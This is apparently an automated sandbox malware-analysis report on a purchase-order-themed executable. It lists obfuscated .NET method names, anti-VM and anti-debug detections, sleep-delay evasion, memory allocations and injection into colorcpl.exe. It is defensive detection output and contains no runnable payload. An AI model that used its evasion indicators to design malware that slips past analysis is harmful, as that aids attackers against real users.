                Source: 0.2.2998MOD PO.exe.4666e78.1.raw.unpack, f6ijMJHORTQRhNugqL.csHigh entropy of concatenated method names: 'Dispose', 'g9WAKlRnb6', 'XhqVUeR2BV', 'U9vGGhuAMq', 'PPyACj87Kr', 'FScAzneM7v', 'ProcessDialogKey', 'C6GVGjX7Sv', 'jtbVAl4V0t', 'XAeVVB8YJ6'
                Source: 0.2.2998MOD PO.exe.4666e78.1.raw.unpack, WLiWCAcvwIfxDKCaWi.csHigh entropy of concatenated method names: 'ToString', 'igQuLDVyDD', 'kdruUNml9f', 'xjauDtEpHq', 'EgLu93fV1P', 'GCluBUKZmZ', 'oQWuIq4dmV', 'QUhubWyBrw', 'FYWuOUYrsX', 'E4wuEOltyO'
                Source: 0.2.2998MOD PO.exe.4666e78.1.raw.unpack, kyj87KTr7ScneM7v26.csHigh entropy of concatenated method names: 'plCQvxEf01', 'XGaQHXS2hu', 'hm3QZypwaZ', 'aAWQRpvqbc', 'eCoQxjdrmi', 'k7aQsJqiI1', 'a03QPSwyiq', 'bKfQpHlGwW', 'NlwQoeeV4Q', 'dkPQtIBUFL'
                Source: 0.2.2998MOD PO.exe.4666e78.1.raw.unpack, e7iHOazfdRADLFCyRX.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'CbFmeSxOJx', 'wdrm18NP2O', 'WNdmuOfnFQ', 'cs1m38lhVU', 'ceUmQxMkAV', 'PQcmmfOJD5', 'g4emaKE7yJ'
                Source: 0.2.2998MOD PO.exe.4666e78.1.raw.unpack, WMgNXPg2RPSOrhK9eh.csHigh entropy of concatenated method names: 'TjKeW6uuhl', 'JXaeNak938', 'DUfe79wOjP', 'JZBeUGwj6a', 'B8ue90HnLg', 'mOSeBFsg97', 'jdKeb4XNuj', 'fLjeOOlJUe', 'zD1elAbgA7', 'SlBeLQwPAF'
                Source: 0.2.2998MOD PO.exe.4666e78.1.raw.unpack, TWS96jZxAX3EN502gS.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'NCLVKjoOGe', 'J3aVC65g2J', 'nKvVzcmJkP', 'UdRqGQQncQ', 'ayMqAQjPUp', 'YyuqVjS1j2', 'lq7qqnsDgr', 'AnP8IBzLo4heWACJmJ'
                Source: 0.2.2998MOD PO.exe.4666e78.1.raw.unpack, yoC8k9AGeE8sgPPbwXA.csHigh entropy of concatenated method names: 'QDlmS25Jsq', 'JYumnoZws9', 'poYmr8lGNv', 'IRUm0MaH8k', 'pvUm4ThjHS', 'IMhm2R26Kr', 'NwxmdRDWpi', 'PvWmWnCle1', 'mmhmN6vLPA', 'XtmmF9qsUT'
                Source: 0.2.2998MOD PO.exe.4666e78.1.raw.unpack, WnrTXVbngDZ3l5EyUi.csHigh entropy of concatenated method names: 'C6qsvkEMuJ', 'sU8sZI8ecH', 'vk6sxtLQGc', 'a9QxCfCQsl', 'fyhxzvp9QX', 'TCPsG20i6S', 'BYFsAYwXGd', 'NgnsVYGuNv', 'qbdsqKWHQJ', 'oT5sY5xSq0'
                Source: 0.2.2998MOD PO.exe.4666e78.1.raw.unpack, GuVZeiWWGgyIsVPOZB.csHigh entropy of concatenated method names: 'hF7HJBiPwH', 'j1YHMI118Y', 'ce1Hc5DkQT', 'E0WH8cGuox', 'V0eHhT1jbp', 'weGHyuOcHq', 'qAaH5aie6X', 'x1wHT8S8cr', 'tXoHKdV8qc', 'XUnHCkddwl'
                Source: 0.2.2998MOD PO.exe.4666e78.1.raw.unpack, J8YJ6nCparoCklRBhk.csHigh entropy of concatenated method names: 'OdemAsdVH6', 'dekmq8MPrV', 'bsEmYZtRU9', 'TqKmvaDUWB', 'aoRmHfCoyo', 'tGZmRf2hbN', 'KhymxNdQfB', 'fsyQ55L4Yg', 'FRSQTxesBd', 'QrwQKl5Wh6'
                Source: 0.2.2998MOD PO.exe.4666e78.1.raw.unpack, e6csmyNd1AuCqsOHuU.csHigh entropy of concatenated method names: 'Re7Z0N6w07', 'UClZ2UkCZs', 'tOIZW0hHJL', 'hGAZNw4gA5', 'RUQZ1vdC3o', 'lLoZuloGso', 'DllZ3mHlmy', 'nWaZQemowf', 'dPVZmZW54H', 'JywZa10SRi'
                Source: 0.2.2998MOD PO.exe.4666e78.1.raw.unpack, R92djQEdSh5jkUnu7Y.csHigh entropy of concatenated method names: 'RFgsSkmWxD', 'hyYsnyxpcB', 'qassrl3ws5', 'wv0s047Uua', 'vTQs4muanQ', 'tXTs2Ngl5D', 'Q5psd8PDBQ', 'e2HsWqv4Km', 'BdQsNFIthg', 'sDXsFP8oZ4'
                Source: 0.2.2998MOD PO.exe.4666e78.1.raw.unpack, ajX7SvKstbl4V0tKAe.csHigh entropy of concatenated method names: 'rLcQ7qDm4V', 'MS1QUtK6OX', 'raVQDPtmsg', 'Oc7Q9yZraa', 'pSaQJmcfJD', 'g4kQBFGvtw', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.2998MOD PO.exe.4666e78.1.raw.unpack, dBKwEy8HgOOo4pITZv.csHigh entropy of concatenated method names: 'Mw23oEYFvY', 'B053t70mF7', 'ToString', 'OD43vQRfgJ', 'Avv3HRtxVQ', 'p9d3ZkxhMN', 'V2s3RMS0bh', 'aef3xgUBxo', 'lYS3s06pnc', 'HXY3Pk76dN'
                Source: 0.2.2998MOD PO.exe.4666e78.1.raw.unpack, kQ6WtiAqcS5W9tw0Oxs.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'O7DaJuaw7A', 'tgIaMIOEAV', 'rt9acop79a', 'iUMa8VqfaN', 'N0nahGgG28', 'rh4ayENCgB', 'Udxa5rcUTJ'
                Source: 0.2.2998MOD PO.exe.4666e78.1.raw.unpack, tFIMTA79oCEVXEbenh.csHigh entropy of concatenated method names: 'XUTxjK4Woj', 'VVQxHQvYJj', 'WgaxRYJcfy', 'FJbxs3fpwa', 'BwCxPkC0U5', 'Jy2RhO9jMZ', 'ATERypmftS', 'i2cR5upHoM', 'acqRTWjaiw', 'PwPRKJQw9W'
                Source: 0.2.2998MOD PO.exe.4666e78.1.raw.unpack, xdVRuwVnxyYCMZQs8n.csHigh entropy of concatenated method names: 'O5krvD0OT', 'eQO0C377x', 'H1Y25QDcO', 'L3QdwFmTE', 'NZrNynmGt', 'YxOFxuSMM', 'jOOjjlZu3PLatRliU8', 'V58a8IE0CyRCCoJ09h', 'KOdQtuFon', 'K4gamTItu'
                Source: 0.2.2998MOD PO.exe.4666e78.1.raw.unpack, xKPA6QYeUQDw6KZEyv.csHigh entropy of concatenated method names: 'YIUAsuVZei', 'DGgAPyIsVP', 'Vd1AoAuCqs', 'MHuAtUCx0G', 'NP5A1i8fFI', 'RTAAu9oCEV', 'n6gmfh5pChGwbgX4pJ', 'jNpIZ2vXCOO8H7Z3o3', 'A1XAA6Ty1v', 'euMAqjvVIi'
                Source: C:\Users\user\Desktop\2998MOD PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: 2998MOD PO.exe PID: 7332, type: MEMORYSTR
                Switches to a custom stack to bypass stack traces
                Source: C:\Windows\SysWOW64\colorcpl.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
                Source: C:\Windows\SysWOW64\colorcpl.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
                Source: C:\Users\user\Desktop\2998MOD PO.exeMemory allocated: 1170000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeMemory allocated: 2B10000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeMemory allocated: 4B10000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeMemory allocated: 8CC0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeMemory allocated: 7540000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeMemory allocated: 9CC0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeMemory allocated: ACC0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeMemory allocated: B630000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeMemory allocated: C630000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeMemory allocated: D630000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C096E rdtsc 4_2_019C096E
                Source: C:\Users\user\Desktop\2998MOD PO.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\colorcpl.exeAPI coverage: 1.6 %
                Source: C:\Users\user\Desktop\2998MOD PO.exe TID: 7352Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\uZYYnmPedNYIjWqPsWOYKeetmwkKyGZUKAuFniHMcygNfALrFzFrLvWGPJTnONRCeIDRYuvUw\sePlrCtAXqpc.exe TID: 7988Thread sleep time: -120000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: sePlrCtAXqpc.exe, 00000009.00000002.3562517847.0000000000B1F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllV
                Source: colorcpl.exe, 00000008.00000002.2287863958.0000000002F5D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllQ(y
                Source: C:\Users\user\Desktop\2998MOD PO.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\colorcpl.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C096E rdtsc 4_2_019C096E
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_00417563 LdrLoadDll,4_2_00417563
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0197A197 mov eax, dword ptr fs:[00000030h]4_2_0197A197
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0197A197 mov eax, dword ptr fs:[00000030h]4_2_0197A197
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0197A197 mov eax, dword ptr fs:[00000030h]4_2_0197A197
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C0185 mov eax, dword ptr fs:[00000030h]4_2_019C0185
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A24180 mov eax, dword ptr fs:[00000030h]4_2_01A24180
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A24180 mov eax, dword ptr fs:[00000030h]4_2_01A24180
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A3C188 mov eax, dword ptr fs:[00000030h]4_2_01A3C188
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A3C188 mov eax, dword ptr fs:[00000030h]4_2_01A3C188
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A0019F mov eax, dword ptr fs:[00000030h]4_2_01A0019F
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A0019F mov eax, dword ptr fs:[00000030h]4_2_01A0019F
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A0019F mov eax, dword ptr fs:[00000030h]4_2_01A0019F
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A0019F mov eax, dword ptr fs:[00000030h]4_2_01A0019F
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A561E5 mov eax, dword ptr fs:[00000030h]4_2_01A561E5
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019FE1D0 mov eax, dword ptr fs:[00000030h]4_2_019FE1D0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019FE1D0 mov eax, dword ptr fs:[00000030h]4_2_019FE1D0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019FE1D0 mov ecx, dword ptr fs:[00000030h]4_2_019FE1D0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019FE1D0 mov eax, dword ptr fs:[00000030h]4_2_019FE1D0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019FE1D0 mov eax, dword ptr fs:[00000030h]4_2_019FE1D0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019B01F8 mov eax, dword ptr fs:[00000030h]4_2_019B01F8
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A461C3 mov eax, dword ptr fs:[00000030h]4_2_01A461C3
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A461C3 mov eax, dword ptr fs:[00000030h]4_2_01A461C3
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A2E10E mov eax, dword ptr fs:[00000030h]4_2_01A2E10E
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A2E10E mov ecx, dword ptr fs:[00000030h]4_2_01A2E10E
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A2E10E mov eax, dword ptr fs:[00000030h]4_2_01A2E10E
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A2E10E mov eax, dword ptr fs:[00000030h]4_2_01A2E10E
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A2E10E mov ecx, dword ptr fs:[00000030h]4_2_01A2E10E
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A2E10E mov eax, dword ptr fs:[00000030h]4_2_01A2E10E
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A2E10E mov eax, dword ptr fs:[00000030h]4_2_01A2E10E
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A2E10E mov ecx, dword ptr fs:[00000030h]4_2_01A2E10E
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A2E10E mov eax, dword ptr fs:[00000030h]4_2_01A2E10E
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A2E10E mov ecx, dword ptr fs:[00000030h]4_2_01A2E10E
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A40115 mov eax, dword ptr fs:[00000030h]4_2_01A40115
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A2A118 mov ecx, dword ptr fs:[00000030h]4_2_01A2A118
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A2A118 mov eax, dword ptr fs:[00000030h]4_2_01A2A118
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A2A118 mov eax, dword ptr fs:[00000030h]4_2_01A2A118
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A2A118 mov eax, dword ptr fs:[00000030h]4_2_01A2A118
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019B0124 mov eax, dword ptr fs:[00000030h]4_2_019B0124
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0197C156 mov eax, dword ptr fs:[00000030h]4_2_0197C156
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01986154 mov eax, dword ptr fs:[00000030h]4_2_01986154
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01986154 mov eax, dword ptr fs:[00000030h]4_2_01986154
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A14144 mov eax, dword ptr fs:[00000030h]4_2_01A14144
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A14144 mov eax, dword ptr fs:[00000030h]4_2_01A14144
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A14144 mov ecx, dword ptr fs:[00000030h]4_2_01A14144
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A14144 mov eax, dword ptr fs:[00000030h]4_2_01A14144
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A14144 mov eax, dword ptr fs:[00000030h]4_2_01A14144
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A18158 mov eax, dword ptr fs:[00000030h]4_2_01A18158
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A180A8 mov eax, dword ptr fs:[00000030h]4_2_01A180A8
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0198208A mov eax, dword ptr fs:[00000030h]4_2_0198208A
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A460B8 mov eax, dword ptr fs:[00000030h]4_2_01A460B8
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A460B8 mov ecx, dword ptr fs:[00000030h]4_2_01A460B8
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A060E0 mov eax, dword ptr fs:[00000030h]4_2_01A060E0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0197C0F0 mov eax, dword ptr fs:[00000030h]4_2_0197C0F0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019C20F0 mov ecx, dword ptr fs:[00000030h]4_2_019C20F0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019880E9 mov eax, dword ptr fs:[00000030h]4_2_019880E9
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0197A0E3 mov ecx, dword ptr fs:[00000030h]4_2_0197A0E3
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A020DE mov eax, dword ptr fs:[00000030h]4_2_01A020DE
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0199E016 mov eax, dword ptr fs:[00000030h]4_2_0199E016
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0199E016 mov eax, dword ptr fs:[00000030h]4_2_0199E016
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0199E016 mov eax, dword ptr fs:[00000030h]4_2_0199E016
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0199E016 mov eax, dword ptr fs:[00000030h]4_2_0199E016
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A16030 mov eax, dword ptr fs:[00000030h]4_2_01A16030
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A04000 mov ecx, dword ptr fs:[00000030h]4_2_01A04000
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A22000 mov eax, dword ptr fs:[00000030h]4_2_01A22000
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A22000 mov eax, dword ptr fs:[00000030h]4_2_01A22000
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A22000 mov eax, dword ptr fs:[00000030h]4_2_01A22000
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A22000 mov eax, dword ptr fs:[00000030h]4_2_01A22000
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A22000 mov eax, dword ptr fs:[00000030h]4_2_01A22000
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A22000 mov eax, dword ptr fs:[00000030h]4_2_01A22000
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A22000 mov eax, dword ptr fs:[00000030h]4_2_01A22000
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A22000 mov eax, dword ptr fs:[00000030h]4_2_01A22000
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0197A020 mov eax, dword ptr fs:[00000030h]4_2_0197A020
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0197C020 mov eax, dword ptr fs:[00000030h]4_2_0197C020
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01982050 mov eax, dword ptr fs:[00000030h]4_2_01982050
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019AC073 mov eax, dword ptr fs:[00000030h]4_2_019AC073
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A06050 mov eax, dword ptr fs:[00000030h]4_2_01A06050
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01978397 mov eax, dword ptr fs:[00000030h]4_2_01978397
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01978397 mov eax, dword ptr fs:[00000030h]4_2_01978397
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01978397 mov eax, dword ptr fs:[00000030h]4_2_01978397
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019A438F mov eax, dword ptr fs:[00000030h]4_2_019A438F
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019A438F mov eax, dword ptr fs:[00000030h]4_2_019A438F
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0197E388 mov eax, dword ptr fs:[00000030h]4_2_0197E388
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0197E388 mov eax, dword ptr fs:[00000030h]4_2_0197E388
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0197E388 mov eax, dword ptr fs:[00000030h]4_2_0197E388
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0198A3C0 mov eax, dword ptr fs:[00000030h]4_2_0198A3C0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0198A3C0 mov eax, dword ptr fs:[00000030h]4_2_0198A3C0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0198A3C0 mov eax, dword ptr fs:[00000030h]4_2_0198A3C0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0198A3C0 mov eax, dword ptr fs:[00000030h]4_2_0198A3C0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0198A3C0 mov eax, dword ptr fs:[00000030h]4_2_0198A3C0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0198A3C0 mov eax, dword ptr fs:[00000030h]4_2_0198A3C0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019883C0 mov eax, dword ptr fs:[00000030h]4_2_019883C0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019883C0 mov eax, dword ptr fs:[00000030h]4_2_019883C0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019883C0 mov eax, dword ptr fs:[00000030h]4_2_019883C0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019883C0 mov eax, dword ptr fs:[00000030h]4_2_019883C0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A063C0 mov eax, dword ptr fs:[00000030h]4_2_01A063C0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019B63FF mov eax, dword ptr fs:[00000030h]4_2_019B63FF
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0199E3F0 mov eax, dword ptr fs:[00000030h]4_2_0199E3F0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0199E3F0 mov eax, dword ptr fs:[00000030h]4_2_0199E3F0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_0199E3F0 mov eax, dword ptr fs:[00000030h]4_2_0199E3F0
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_01A3C3CD mov eax, dword ptr fs:[00000030h]4_2_01A3C3CD
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019903E9 mov eax, dword ptr fs:[00000030h]4_2_019903E9
                Source: C:\Users\user\Desktop\2998MOD PO.exeCode function: 4_2_019903E9 mov eax, dword ptr fs:[00000030h]4_2_019903E9
